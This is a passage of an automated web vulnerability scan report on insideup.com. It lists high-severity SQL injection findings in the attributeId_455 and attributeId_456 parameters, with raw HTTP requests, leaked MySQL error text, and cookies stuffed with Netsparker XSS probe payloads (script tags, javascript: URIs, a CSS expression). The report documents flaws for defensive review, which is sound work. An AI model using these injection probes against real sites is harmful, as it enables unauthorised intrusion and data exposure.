OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:59:20 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=nmc4ocen6r4uh9fb1kmb8veq01; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 16242


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.289. http://www.insideup.com/ppc/leadflow/fist00/project.php [attributeId_455 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/fist00/project.php

Issue detail

The attributeId_455 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_455 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_452%5B%5D=2936__Financial+statement+creation&attributeId_453=2944__No+-+No+preference&attributeId_454=2948__Not+sure&attributeId_455=2955__ASAP'&attributeId_456=2961__Still+in+the+planning+stages&attributeId_457=2968__Less+than+%24100%2c000&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=10003&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:59:26 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=oq84mlktscg2gf4s2a6pgqbc75; path=/
Content-Length: 6510
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
es&attributeId_457=2968__Less than $100,000&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=10003&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'the planning stages&attributeId_457=2968__Less than $100,000&button3=Submit&comp' at line 5

Request 2

GET /ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_452%5B%5D=2936__Financial+statement+creation&attributeId_453=2944__No+-+No+preference&attributeId_454=2948__Not+sure&attributeId_455=2955__ASAP''&attributeId_456=2961__Still+in+the+planning+stages&attributeId_457=2968__Less+than+%24100%2c000&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=10003&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:59:28 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=nj6gq6bch3p26s8n1ejhfbla83; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 16242


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.290. http://www.insideup.com/ppc/leadflow/fist00/project.php [attributeId_456 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/fist00/project.php

Issue detail

The attributeId_456 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_456 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_452%5B%5D=2936__Financial+statement+creation&attributeId_453=2944__No+-+No+preference&attributeId_454=2948__Not+sure&attributeId_455=2955__ASAP&attributeId_456=2961__Still+in+the+planning+stages'&attributeId_457=2968__Less+than+%24100%2c000&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=10003&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:59:32 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=pqp6khfeenmfvh8vc5inhalgc2; path=/
Content-Length: 6510
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
s'&attributeId_457=2968__Less than $100,000&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=10003&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'than $100,000&button3=Submit&companyname=Company Name&emailaddress=Email&firstna' at line 5

Request 2

GET /ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_452%5B%5D=2936__Financial+statement+creation&attributeId_453=2944__No+-+No+preference&attributeId_454=2948__Not+sure&attributeId_455=2955__ASAP&attributeId_456=2961__Still+in+the+planning+stages''&attributeId_457=2968__Less+than+%24100%2c000&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=10003&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; 